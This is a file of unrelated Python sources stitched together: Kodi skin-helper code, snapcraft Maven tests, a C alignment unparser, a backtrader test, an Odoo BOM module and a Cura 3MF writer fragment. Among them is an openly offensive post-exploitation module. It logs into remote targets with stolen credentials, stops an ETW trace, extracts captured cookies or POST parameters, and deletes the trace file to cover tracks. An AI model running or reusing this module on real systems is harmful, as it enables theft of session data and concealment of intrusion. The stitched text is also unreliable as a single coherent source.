if li_trailer and (li_title == xbmc.getInfoLabel("%sListItem.Title"
% widget_container_prefix).decode('utf-8')):
if trailer_mode == "fullscreen" and li_trailer:
xbmc.executebuiltin('PlayMedia("%s")' % li_trailer)
else:
xbmc.executebuiltin('PlayMedia("%s",1)' % li_trailer)
self.win.setProperty("TrailerPlaying", trailer_mode)
self.win.clearProperty("traileractionbusy")
def colorpicker(self):
'''legacy'''
self.deprecated_method("script.skin.helper.colorpicker")
def backup(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def restore(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def reset(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def colorthemes(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def createcolortheme(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def restorecolortheme(self):
'''legacy'''
self.deprecated_method("script.skin.helper.skinbackup")
def conditionalbackgrounds(self):
'''legacy'''
self.deprecated_method("script.skin.helper.backgrounds")
def splashscreen(self):
'''helper to show a user defined splashscreen in the skin'''
import time
splashfile = self.params.get("file", "")
duration = int(self.params.get("duration", 5))
if (splashfile.lower().endswith("jpg") or splashfile.lower().endswith("gif") or
splashfile.lower().endswith("png") or splashfile.lower().endswith("tiff")):
# this is an image file
self.win.setProperty("SkinHelper.SplashScreen", splashfile)
# for images we just wait for X seconds to close the splash again
start_time = time.time()
while (time.time() - start_time) <= duration:
xbmc.sleep(500)
else:
# for video or audio we have to wait for the player to finish...
xbmc.Player().play(splashfile, windowed=True)
xbmc.sleep(500)
while xbmc.getCondVisibility("Player.HasMedia"):
xbmc.sleep(150)
# replace startup window with home
startupwindow = xbmc.getInfoLabel("System.StartupWindow")
xbmc.executebuiltin("ReplaceWindow(%s)" % startupwindow)
autostart_playlist = xbmc.getInfoLabel("$ESCINFO[Skin.String(autostart_playlist)]")
if autostart_playlist:
xbmc.executebuiltin("PlayMedia(%s)" % autostart_playlist)
def videosearch(self):
'''show the special search dialog'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
from resources.lib.searchdialog import SearchDialog
search_dialog = SearchDialog("script-skin_helper_service-CustomSearch.xml",
self.addon.getAddonInfo('path').decode("utf-8"), "Default", "1080i")
search_dialog.doModal()
del search_dialog
def showinfo(self):
'''shows our special videoinfo dialog'''
dbid = self.params.get("dbid", "")
dbtype = self.params.get("dbtype", "")
from infodialog import show_infodialog
show_infodialog(dbid, dbtype)
def deletedir(self):
'''helper to delete a directory, input can be normal filesystem path or vfs'''
del_path = self.params.get("path")
if del_path:
ret = xbmcgui.Dialog().yesno(heading=xbmc.getLocalizedString(122),
line1=u"%s[CR]%s" % (xbmc.getLocalizedString(125), del_path))
if ret:
success = recursive_delete_dir(del_path)
if success:
xbmcgui.Dialog().ok(heading=xbmc.getLocalizedString(19179),
line1=self.addon.getLocalizedString(32014))
else:
xbmcgui.Dialog().ok(heading=xbmc.getLocalizedString(16205),
                                    line1=self.addon.getLocalizedString(32015))
def overlaytexture(self):
'''legacy: helper to let the user choose a background overlay from a skin defined folder'''
skinstring = self.params.get("skinstring", "BackgroundOverlayTexture")
self.params["skinstring"] = skinstring
self.params["resourceaddon"] = "resource.images.backgroundoverlays"
self.params["customfolder"] = "special://skin/extras/bgoverlays/"
self.params["allowmulti"] = "false"
self.params["header"] = self.addon.getLocalizedString(32002)
self.selectimage()
def busytexture(self):
'''legacy: helper which lets the user select a busy spinner from predefined spinners in the skin'''
skinstring = self.params.get("skinstring", "SkinHelper.SpinnerTexture")
self.params["skinstring"] = skinstring
self.params["resourceaddon"] = "resource.images.busyspinners"
self.params["customfolder"] = "special://skin/extras/busy_spinners/"
self.params["allowmulti"] = "true"
self.params["header"] = self.addon.getLocalizedString(32006)
self.selectimage()
def selectimage(self):
'''helper which lets the user select an image or imagepath from resourceaddons or custom path'''
skinsettings = SkinSettings()
skinstring = self.params.get("skinstring", "")
skinshortcutsprop = self.params.get("skinshortcutsproperty", "")
current_value = self.params.get("currentvalue", "")
resource_addon = self.params.get("resourceaddon", "")
allow_multi = self.params.get("allowmulti", "false") == "true"
windowheader = self.params.get("header", "")
skinhelper_backgrounds = self.params.get("skinhelperbackgrounds", "false") == "true"
label, value = skinsettings.select_image(
skinstring, allow_multi=allow_multi, windowheader=windowheader, resource_addon=resource_addon,
skinhelper_backgrounds=skinhelper_backgrounds, current_value=current_value)
if label:
if skinshortcutsprop:
# write value to skinshortcuts prop
from skinshortcuts import set_skinshortcuts_property
set_skinshortcuts_property(skinshortcutsprop, value, label)
else:
# write the values to skin strings
if value.startswith("$INFO"):
# we got an dynamic image from window property
skinsettings.set_skin_variable(skinstring, value)
value = "$VAR[%s]" % skinstring
skinstring = skinstring.encode("utf-8")
label = label.encode("utf-8")
xbmc.executebuiltin("Skin.SetString(%s.label,%s)" % (skinstring, label))
xbmc.executebuiltin("Skin.SetString(%s.name,%s)" % (skinstring, label))
xbmc.executebuiltin("Skin.SetString(%s,%s)" % (skinstring, value))
xbmc.executebuiltin("Skin.SetString(%s.path,%s)" % (skinstring, value))
del skinsettings
def dialogok(self):
'''helper to show an OK dialog with a message'''
headertxt = self.params.get("header")
bodytxt = self.params.get("message")
if bodytxt.startswith(" "):
bodytxt = bodytxt[1:]
if headertxt.startswith(" "):
headertxt = headertxt[1:]
dialog = xbmcgui.Dialog()
dialog.ok(heading=headertxt, line1=bodytxt)
del dialog
def dialogyesno(self):
'''helper to show a YES/NO dialog with a message'''
headertxt = self.params.get("header")
bodytxt = self.params.get("message")
yesactions = self.params.get("yesaction", "").split("|")
noactions = self.params.get("noaction", "").split("|")
if bodytxt.startswith(" "):
bodytxt = bodytxt[1:]
if headertxt.startswith(" "):
headertxt = headertxt[1:]
if xbmcgui.Dialog().yesno(heading=headertxt, line1=bodytxt):
for action in yesactions:
xbmc.executebuiltin(action.encode("utf-8"))
else:
for action in noactions:
xbmc.executebuiltin(action.encode("utf-8"))
def textviewer(self):
'''helper to show a textviewer dialog with a message'''
headertxt = self.params.get("header", "")
bodytxt = self.params.get("message", "")
if bodytxt.startswith(" "):
bodytxt = bodytxt[1:]
if headertxt.startswith(" "):
headertxt = headertxt[1:]
xbmcgui.Dialog().textviewer(headertxt, bodytxt)
def fileexists(self):
'''helper to let the skinner check if a file exists
and write the outcome to a window prop or skinstring'''
filename = self.params.get("file")
skinstring = self.params.get("skinstring")
windowprop = self.params.get("winprop")
if xbmcvfs.exists(filename):
if windowprop:
self.win.setProperty(windowprop, "exists")
if skinstring:
xbmc.executebuiltin("Skin.SetString(%s,exists)" % skinstring)
else:
if windowprop:
self.win.clearProperty(windowprop)
if skinstring:
xbmc.executebuiltin("Skin.Reset(%s)" % skinstring)
def stripstring(self):
'''helper to allow the skinner to strip a string and write results to a skin string'''
splitchar = self.params.get("splitchar")
if splitchar.upper() == "[SPACE]":
splitchar = " "
skinstring = self.params.get("string")
if not skinstring:
skinstring = self.params.get("skinstring")
output = self.params.get("output")
index = self.params.get("index", 0)
skinstring = skinstring.split(splitchar)[int(index)]
self.win.setProperty(output, skinstring)
def getfilename(self, filename=""):
        '''helper to display a sanitized filename in the videoinfo dialog'''
output = self.params.get("output")
if not filename:
filename = xbmc.getInfoLabel("ListItem.FileNameAndPath")
if not filename:
filename = xbmc.getInfoLabel("ListItem.FileName")
if "filename=" in filename:
url_params = dict(urlparse.parse_qsl(filename))
filename = url_params.get("filename")
self.win.setProperty(output, filename)
def getplayerfilename(self):
'''helper to parse the filename from a plugin (e.g. emby) filename'''
filename = xbmc.getInfoLabel("Player.FileNameAndPath")
if not filename:
filename = xbmc.getInfoLabel("Player.FileName")
self.getfilename(filename)
def getpercentage(self):
'''helper to calculate the percentage of 2 numbers and write results to a skinstring'''
total = int(params.get("total"))
count = int(params.get("count"))
roundsteps = self.params.get("roundsteps")
skinstring = self.params.get("skinstring")
percentage = int(round((1.0 * count / total) * 100))
if roundsteps:
roundsteps = int(roundsteps)
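            # round percentage up to the next multiple of roundsteps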
percentage = percentage + (roundsteps - percentage) % roundsteps
xbmc.executebuiltin("Skin.SetString(%s,%s)" % (skinstring, percentage))
def setresourceaddon(self):
'''helper to let the user choose a resource addon and set that as skin string'''
from resourceaddons import setresourceaddon
addontype = self.params.get("addontype", "")
skinstring = self.params.get("skinstring", "")
setresourceaddon(addontype, skinstring)
def checkresourceaddons(self):
'''allow the skinner to perform a basic check if some required resource addons are available'''
from resourceaddons import checkresourceaddons
addonslist = self.params.get("addonslist", [])
if addonslist:
addonslist = addonslist.split("|")
checkresourceaddons(addonslist)
|
import io
import os
from unittest import mock
from xml.etree import ElementTree
import fixtures
from testtools.matchers import HasLength
import snapcraft
from snapcraft import tests
from snapcraft.plugins import maven
class MavenPluginTestCase(tests.TestCase):
def setUp(self):
super().setUp()
class Options:
maven_options = []
maven_targets = ['']
self.options = Options()
self.project_options = snapcraft.ProjectOptions()
patcher = mock.patch('snapcraft.repo.Ubuntu')
self.ubuntu_mock = patcher.start()
self.addCleanup(patcher.stop)
@staticmethod
def _canonicalize_settings(settings):
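        # Parse the XML and drop whitespace-only text and tail nodes so two
        # settings documents compare equal regardless of pretty-printing.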
with io.StringIO(settings) as f:
tree = ElementTree.parse(f)
for element in tree.iter():
if element.text is not None and element.text.isspace():
element.text = None
if element.tail is not None and element.tail.isspace():
element.tail = None
with io.StringIO() as f:
tree.write(
f, encoding='unicode',
default_namespace='http://maven.apache.org/SETTINGS/1.0.0')
return f.getvalue() + '\n'
def test_get_build_properties(self):
expected_build_properties = ['maven-options', 'maven-targets']
resulting_build_properties = maven.MavenPlugin.get_build_properties()
self.assertThat(resulting_build_properties,
HasLength(len(expected_build_properties)))
for property in expected_build_properties:
self.assertIn(property, resulting_build_properties)
def assertSettingsEqual(self, expected, observed):
print(repr(self._canonicalize_settings(expected)))
print(repr(self._canonicalize_settings(observed)))
self.assertEqual(
self._canonicalize_settings(expected),
self._canonicalize_settings(observed))
def test_schema(self):
schema = maven.MavenPlugin.schema()
properties = schema['properties']
self.assertTrue('maven-options' in properties,
'Expected "maven-options" to be included in '
'properties')
maven_options = properties['maven-options']
self.assertTrue(
'type' in maven_options,
'Expected "type" to be included in "maven-options"')
self.assertEqual(maven_options['type'], 'array',
'Expected "maven-options" "type" to be "array", but '
'it was "{}"'.format(maven_options['type']))
self.assertTrue(
'minitems' in maven_options,
'Expected "minitems" to be included in "maven-options"')
self.assertEqual(maven_options['minitems'], 1,
'Expected "maven-options" "minitems" to be 1, but '
'it was "{}"'.format(maven_options['minitems']))
self.assertTrue(
'uniqueItems' in maven_options,
'Expected "uniqueItems" to be included in "maven-options"')
self.assertTrue(
maven_options['uniqueItems'],
'Expected "maven-options" "uniqueItems" to be "True"')
maven_targets = properties['maven-targets']
self.assertTrue(
'type' in maven_targets,
'Expected "type" to be included in "maven-targets"')
self.assertEqual(maven_targets['type'], 'array',
'Expected "maven-targets" "type" to be "array", but '
'it was "{}"'.format(maven_targets['type']))
self.assertTrue(
'minitems' in maven_targets,
'Expected "minitems" to be included in "maven-targets"')
self.assertEqual(maven_targets['minitems'], 1,
'Expected "maven-targets" "minitems" to be 1, but '
'it was "{}"'.format(maven_targets['minitems']))
self.assertTrue(
'uniqueItems' in maven_targets,
'Expected "uniqueItems" to be included in "maven-targets"')
self.assertTrue(
maven_targets['uniqueItems'],
'Expected "maven-targets" "uniqueItems" to be "True"')
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_fail(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
os.makedirs(plugin.sourcedir)
self.assertRaises(RuntimeError, plugin.build)
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_war(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.war'), 'w').close()
run_mock.side_effect = side
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_targets(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
opts = self.options
opts.maven_targets = ['child1', 'child2']
plugin = maven.MavenPlugin('test-part', opts,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir,
'child1', 'target'))
os.makedirs(os.path.join(plugin.builddir,
'child2', 'target'))
open(os.path.join(plugin.builddir,
'child1', 'target', 'child1.jar'), 'w').close()
open(os.path.join(plugin.builddir,
'child2', 'target', 'child2.jar'), 'w').close()
run_mock.side_effect = side
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_proxy(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', None),
('no_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_proxy_and_no_proxy(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', None),
('no_proxy', 'internal'),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>internal</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_proxy_and_no_proxies(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', None),
('no_proxy', 'internal, pseudo-dmz'),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>internal|pseudo-dmz</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_and_https_proxy(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', 'http://localhost:3133'),
('no_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' <proxy>\n'
' <id>https_proxy</id>\n'
' <active>true</active>\n'
' <protocol>https</protocol>\n'
' <host>localhost</host>\n'
' <port>3133</port>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_authenticated_proxies(self, run_mock):
env_vars = (
('http_proxy', 'http://user1:pass1@localhost:3132'),
('https_proxy', 'http://user2:pass2@localhost:3133'),
('no_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <username>user1</username>\n'
' <password>pass1</password>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' <proxy>\n'
' <id>https_proxy</id>\n'
' <active>true</active>\n'
' <protocol>https</protocol>\n'
' <host>localhost</host>\n'
' <port>3133</port>\n'
' <username>user2</username>\n'
' <password>pass2</password>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
|
import sys
def unparseToC(vars, annot_body_code, indent, extra_indent):
'''Unparse to C/C++ code'''
if len(vars) == 0:
return annot_body_code
s = '\n'
s += indent + '#pragma disjoint ('
for i, v in enumerate(vars):
if i > 0:
s += ', '
s += '*' + __printAddressC(v.var_name, v.dimensions)
s += ') \n'
s += indent + 'if ((('
for i, v in enumerate(vars):
if i > 0:
s += '|'
s += '(int)(' + __printAddressC(v.var_name, v.dimensions) + ')'
s += ') & 0xF) == 0) {\n'
for v in vars:
s += indent + extra_indent
s += '__alignx(16,' + __printAddressC(v.var_name, v.dimensions) + ');\n'
s += annot_body_code.replace('\n', '\n' + extra_indent)
s += '\n'
s += indent + '} else {\n'
s += annot_body_code.replace('\n', '\n' + extra_indent)
s += '\n'
s += indent + '}\n'
s += indent
return s
def unparseToFortran(vars, annot_body_code, indent, extra_indent):
'''Unparse to Fortran code'''
    print 'error: Fortran is not yet supported in the alignment module'
sys.exit(1)
def __printAddressC(var_name, dimensions):
'''Return the starting address location of the given variable (in C/C++)'''
dimensions = dimensions[:]
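    # Exactly one None placeholder (the unspecified leading dimension) is
    # expected here; list.remove raises ValueError if it is missing.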
dimensions.remove(None)
s = str(var_name)
if len(dimensions) > 0:
s += '['
s += ']['.join(map(str, dimensions))
s += ']'
return s
def __printAddressFortran(var_name, dimensions):
'''Return the starting address location of the given variable (in Fortran)'''
dimensions = dimensions[:]
dimensions.remove(None)
s = str(var_name)
if len(dimensions) > 0:
s += '('
s += ','.join(map(str, dimensions))
s += ')'
return s
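# A minimal usage sketch (the Var class below is hypothetical, standing in for
# the variable objects callers normally pass in):
if __name__ == '__main__':
    class Var(object):
        def __init__(self, var_name, dimensions):
            self.var_name = var_name
            self.dimensions = dimensions
    body = '\nfor (i = 0; i < n; i++) y[i] += a * x[i];'
    print unparseToC([Var('x', [None]), Var('y', [None])], body, '', '  ')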
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import testcommon
import backtrader as bt
import backtrader.indicators as btind
chkdatas = 1
chkvals = [
['4076.212366', '3655.193634', '3576.228000'],
['4178.117675', '3746.573475', '3665.633700'],
['3974.307056', '3563.813794', '3486.822300'],
]
chkmin = 30
chkind = btind.WMAEnvelope
def test_run(main=False):
datas = [testcommon.getdata(i) for i in range(chkdatas)]
testcommon.runtest(datas,
testcommon.TestStrategy,
main=main,
plot=main,
chkind=chkind,
chkmin=chkmin,
chkvals=chkvals)
if __name__ == '__main__':
test_run(main=True)
|
"""
Parses the results found for the ETW started on a machine,
downloads the results and stops the ETW.
All credit to pauldotcom-
http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
Module built by @harmj0y
"""
import settings
from lib import command_methods
from lib import helpers
from lib import smb
class Module:
def __init__(self, targets=None, creds=None, args=None):
self.name = "ETW Data Download"
self.description = "Download data results from ETW and clean everything up."
# internal list() that holds one or more targets
self.targets = targets
# internal list() that holds one or more cred tuples
# [ (username, pw), (username2, pw2), ...]
self.creds = creds
# a state output file that will be written out by pillage.py
        # e.g. if you're querying domain users
self.output = ""
        # options requiring user interaction - format is {Option : [Value, Description]}
self.required_options = { "trigger_method" : ["wmis", "[wmis] or [winexe] for triggering"],
"flag" : ["cookies", "search for [cookies] or [post] parameters"]}
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
            # search for cookies or POST parameters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
command_methods.executeCommand(target, username, password, delCmd, triggerMethod)
if parseResult == "":
self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
else:
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
|
from openerp import models, fields, api, _
import math
class MrpBom(models.Model):
_inherit = 'mrp.bom'
@api.model
def _bom_explode(self, bom, product, factor, properties=None, level=0,
routing_id=False, previous_products=None,
master_bom=None):
routing_id = bom.routing_id.id or routing_id
result, result2 = super(MrpBom, self)._bom_explode(
bom, product, factor, properties=properties, level=level,
routing_id=routing_id, previous_products=previous_products,
master_bom=master_bom)
result2 = self._get_workorder_operations(
result2, factor=factor, level=level, routing_id=routing_id)
return result, result2
def _get_routing_line_from_workorder(self, routing_id, seq, workcenter_id,
wo_name):
""" Returns first routing line from a given data if found
@param routing_id: Routing id
@param seq: workorder sequence
@param workcenter_id: Workcenter id
@return: wo_name = Workorder name
"""
routing_line_obj = self.env['mrp.routing.workcenter']
domain = [('routing_id', '=', routing_id), ('sequence', '=', seq),
('workcenter_id', '=', workcenter_id)]
routing_lines = routing_line_obj.search(domain)
for rl in routing_lines:
if rl.name in wo_name:
return rl
return routing_line_obj
def _get_workorder_operations(self, result2, factor, level=0,
routing_id=False):
for work_order in result2:
if (work_order['sequence'] < level or
work_order.get('routing_wc_line')):
continue
seq = work_order['sequence'] - level
rl = self._get_routing_line_from_workorder(
routing_id, seq, work_order['workcenter_id'],
work_order['name'])
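            # Cycles needed to produce 'factor' units, rounded up; 0 when the
            # routing line defines no cycle capacity (cycle_nbr falsy).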
cycle = rl.cycle_nbr and int(math.ceil(factor / rl.cycle_nbr)) or 0
hour = rl.hour_nbr * cycle
default_wc_line = rl.op_wc_lines.filtered(lambda r: r.default)
work_order['cycle'] = cycle
work_order['hour'] = hour
work_order['time_start'] = default_wc_line.time_start or 0.0
work_order['time_stop'] = default_wc_line.time_stop or 0.0
work_order['routing_wc_line'] = rl.id
work_order['do_production'] = rl.do_production
return result2
@api.multi
@api.onchange('routing_id')
def onchange_routing_id(self):
for line in self.bom_line_ids:
line.operation = (self.routing_id.workcenter_lines and
self.routing_id.workcenter_lines[0])
if self.routing_id:
return {'warning': {
'title': _('Changing Routing'),
'message': _("Changing routing will cause to change the"
" operation in which each component will be"
" consumed, by default it is set the first"
" one of the routing")
}}
return {}
class MrpBomLine(models.Model):
_inherit = 'mrp.bom.line'
operation = fields.Many2one(
comodel_name='mrp.routing.workcenter', string='Consumed in')
|
from UM.Mesh.MeshWriter import MeshWriter
from UM.Math.Vector import Vector
from UM.Logger import Logger
from UM.Math.Matrix import Matrix
from UM.Application import Application
import UM.Scene.SceneNode
import Savitar
import numpy
MYPY = False
try:
if not MYPY:
import xml.etree.cElementTree as ET
except ImportError:
Logger.log("w", "Unable to load cElementTree, switching to slower version")
import xml.etree.ElementTree as ET
import zipfile
import UM.Application
class ThreeMFWriter(MeshWriter):
def __init__(self):
super().__init__()
self._namespaces = {
"3mf": "http://schemas.microsoft.com/3dmanufacturing/core/2015/02",
"content-types": "http://schemas.openxmlformats.org/package/2006/content-types",
"relationships": "http://schemas.openxmlformats.org/package/2006/relationships",
"cura": "http://software.ultimaker.com/xml/cura/3mf/2015/10"
}
self._unit_matrix_string = self._convertMatrixToString(Matrix())
self._archive = None
self._store_archive = False
def _convertMatrixToString(self, matrix):
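        # Serialise the rotation columns and the translation column (first
        # three rows of each) into the space-separated 12-value string that
        # the 3MF transform attribute expects.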
result = ""
result += str(matrix._data[0, 0]) + " "
result += str(matrix._data[1, 0]) + " "
result += str(matrix._data[2, 0]) + " "
result += str(matrix._data[0, 1]) + " "
